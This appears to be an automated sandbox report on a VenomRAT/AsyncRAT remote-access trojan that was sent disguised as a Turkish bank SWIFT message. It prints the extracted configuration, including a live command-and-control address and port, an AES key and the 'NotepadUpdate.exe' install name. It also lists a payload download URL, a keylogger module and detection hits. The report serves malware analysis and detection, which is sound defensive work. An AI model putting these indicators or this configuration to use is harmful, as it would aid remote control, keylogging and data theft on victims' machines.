                  Source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "185.208.158.187", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "NotepadUpdate.exe", "AES_key": "Ijk68MD56nk4n4T5u0ZGNHKlucnIy5B2", "Mutex": "tnybaidkzovl", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "A4QJGpJy/V4cCbTnbG8X0PYHWV+LKegq58mj1q2ZoZfA9x2FqmL8bhLOPQGSBEmtgnKkbETqeRPrsSNvJO3utAVaR5kG3pnQrTTE4Lpy9we7minikcrB8f5ahxH3VCeDhOHw6yDiQnmF1keRGK6R8QzedMamHwNFpeTFBVGJSwg=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "10", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeReversingLabs: Detection: 26%
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeReversingLabs: Detection: 26%
                  Source: C:\Users\user\AppData\Roaming\regasms.exeReversingLabs: Detection: 26%
                  Multi AV Scanner detection for submitted file
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllReversingLabs: Detection: 36%
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\regasms.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllJoe Sandbox ML: detected
                  Source: unknownHTTPS traffic detected: 163.44.198.57:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 163.44.198.57:443 -> 192.168.2.7:49701 version: TLS 1.2
                  Source: Binary string: NVBx.pdb source: regasms.exe, 0000000D.00000000.1359680511.0000000000352000.00000002.00000001.01000000.00000006.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr
                  Source: Binary string: NVBx.pdbSHA256V- source: regasms.exe, 0000000D.00000000.1359680511.0000000000352000.00000002.00000001.01000000.00000006.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 185.208.158.187:4449 -> 192.168.2.7:49756
                  Source: Network trafficSuricata IDS: 2052265 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 185.208.158.187:4449 -> 192.168.2.7:49756
                  Source: Network trafficSuricata IDS: 2052267 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 185.208.158.187:4449 -> 192.168.2.7:49756
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 163.44.198.57 443Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.7:49756 -> 185.208.158.187:4449
                  Source: global trafficHTTP traffic detected: GET /EpWHRWboolCJUXe.exe HTTP/1.1Connection: Keep-AliveHost: 52575815-38-20200406120634.webstarterz.com
                  Source: global trafficHTTP traffic detected: GET /EpWHRWboolCJUXe.exe HTTP/1.1Connection: Keep-AliveHost: 52575815-38-20200406120634.webstarterz.com
                  Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 163.44.198.57:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 163.44.198.57:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.187
                  Source: global trafficHTTP traffic detected: GET /EpWHRWboolCJUXe.exe HTTP/1.1Connection: Keep-AliveHost: 52575815-38-20200406120634.webstarterz.com
                  Source: global trafficHTTP traffic detected: GET /EpWHRWboolCJUXe.exe HTTP/1.1Connection: Keep-AliveHost: 52575815-38-20200406120634.webstarterz.com
                  Source: global trafficDNS traffic detected: DNS query: 52575815-38-20200406120634.webstarterz.com
                  Source: rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: rundll32.exe, 00000005.00000002.1364433339.000000344ECEB000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392342926.000000FEF1D3B000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: regasms.exe, 0000001B.00000002.3741895347.000000000578F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: regasms.exe, 0000001B.00000002.3741895347.000000000578F000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.27.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: rundll32.exe, 00000005.00000002.1364433339.000000344ECEB000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392342926.000000FEF1D3B000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: regasms.exe, 0000000D.00000002.1403401343.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000000F.00000002.1440771055.0000000003121000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1535778393.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, AtkzppDHiyvcIR.exe, 00000015.00000002.1540173205.0000000002851000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.0000000003133000.00000004.00000800.00020000.00000000.sdmp, NotepadUpdate.exe, 00000028.00000002.1574426924.0000000003141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: rundll32.exe, 00000005.00000002.1365084163.0000022E795E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://52575815-38-20200406120634.webstarterz.com/
                  Source: rundll32.exe, 00000005.00000002.1365084163.0000022E7960C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://52575815-38-20200406120634.webstarterz.com/EpWHRWboolCJUXe.exe
                  Source: rundll32.exe, 00000005.00000002.1365084163.0000022E795E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://52575815-38-20200406120634.webstarterz.com:443/EpWHRWboolCJUXe.exe
                  Source: rundll32.exe, 00000005.00000002.1365084163.0000022E79661000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1364433339.000000344ECEB000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392342926.000000FEF1D3B000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                  Source: unknownHTTPS traffic detected: 163.44.198.57:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 163.44.198.57:443 -> 192.168.2.7:49701 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Yara detected AsyncRAT
                  Source: Yara matchFile source: 15.2.regasms.exe.3230128.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28be350.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28d0c2c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regasms.exe.321d84c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.regasms.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28be350.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regasms.exe.3230128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regasms.exe.321d84c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 6696, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AtkzppDHiyvcIR.exe PID: 7628, type: MEMORYSTR
                  Yara detected VenomRAT
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 7464, type: MEMORYSTR
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, Keylogger.cs.Net Code: KeyboardLayout
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, Keylogger.cs.Net Code: KeyboardLayout
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, Keylogger.cs.Net Code: KeyboardLayout
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, Keylogger.cs.Net Code: KeyboardLayout

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 15.2.regasms.exe.3230128.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 13.2.regasms.exe.28be350.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 13.2.regasms.exe.28d0c2c.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 15.2.regasms.exe.321d84c.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 20.2.regasms.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 20_2_00FA32C8 NtProtectVirtualMemory,20_2_00FA32C8
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 20_2_00FA2E73 NtProtectVirtualMemory,20_2_00FA2E73
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 27_2_030F32D0 NtProtectVirtualMemory,27_2_030F32D0
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 27_2_030F2E7A NtProtectVirtualMemory,27_2_030F2E7A
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 27_2_030F3397 NtProtectVirtualMemory,27_2_030F3397
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 32_2_00F732D0 NtProtectVirtualMemory,32_2_00F732D0
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 32_2_00F72E7A NtProtectVirtualMemory,32_2_00F72E7A
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_00A13E3413_2_00A13E34
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_00A1E12413_2_00A1E124
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_00A16F9013_2_00A16F90
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_05850BD413_2_05850BD4
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_058576A813_2_058576A8
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_0585012013_2_05850120
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_0585013013_2_05850130
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_058520F013_2_058520F0
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_05850BC813_2_05850BC8
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_0585769A13_2_0585769A
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_07226A8013_2_07226A80
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_0722A68513_2_0722A685
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_07224BB813_2_07224BB8
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_07224FE013_2_07224FE0
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_07224FF013_2_07224FF0
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_07226A7113_2_07226A71
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_0722391813_2_07223918
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_072230A813_2_072230A8
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_072234E013_2_072234E0
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_0887411713_2_08874117
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_0887124013_2_08871240
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_0887366813_2_08873668
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_08876D0813_2_08876D08
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_0887123013_2_08871230
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_02F83E3415_2_02F83E34
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_02F8E12415_2_02F8E124
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_02F86F9015_2_02F86F90
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_07DD6A1015_2_07DD6A10
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_07DD34E015_2_07DD34E0
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_07DD30A815_2_07DD30A8
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_07DD000715_2_07DD0007
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_07DD4FF015_2_07DD4FF0
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_07DD4FE015_2_07DD4FE0
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_07DD4BB815_2_07DD4BB8
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_07DD9ADF15_2_07DD9ADF
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_07DD6A0015_2_07DD6A00
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_07DD391815_2_07DD3918
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_0928412815_2_09284128
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_0928124015_2_09281240
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_0928366815_2_09283668
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_0928123015_2_09281230
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 20_2_00FA26F820_2_00FA26F8
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 20_2_00FA26E720_2_00FA26E7
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 20_2_00FA2E7320_2_00FA2E73
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_00B93E3421_2_00B93E34
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_00B9E12421_2_00B9E124
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_00B96F9021_2_00B96F90
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_0712366821_2_07123668
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_0712124021_2_07121240
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_0712411721_2_07124117
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_0712123021_2_07121230
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_07126D0821_2_07126D08
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_07606A8021_2_07606A80
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_076099D521_2_076099D5
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_07604FE021_2_07604FE0
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_07604FF021_2_07604FF0
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_076034E021_2_076034E0
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_07604BB821_2_07604BB8
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_07606A7021_2_07606A70
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_0760391821_2_07603918
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_0760000621_2_07600006
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 21_2_076030A821_2_076030A8
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 27_2_030F270027_2_030F2700
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 27_2_030F26EF27_2_030F26EF
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 27_2_030F2E7A27_2_030F2E7A
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 32_2_00F7270032_2_00F72700
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 32_2_00F726EF32_2_00F726EF
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 32_2_00F72E7A32_2_00F72E7A
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_01473E3440_2_01473E34
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_0147E12440_2_0147E124
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_01474B0140_2_01474B01
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_01476F9040_2_01476F90
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_062C0BD440_2_062C0BD4
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_062C76A840_2_062C76A8
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_062C20F040_2_062C20F0
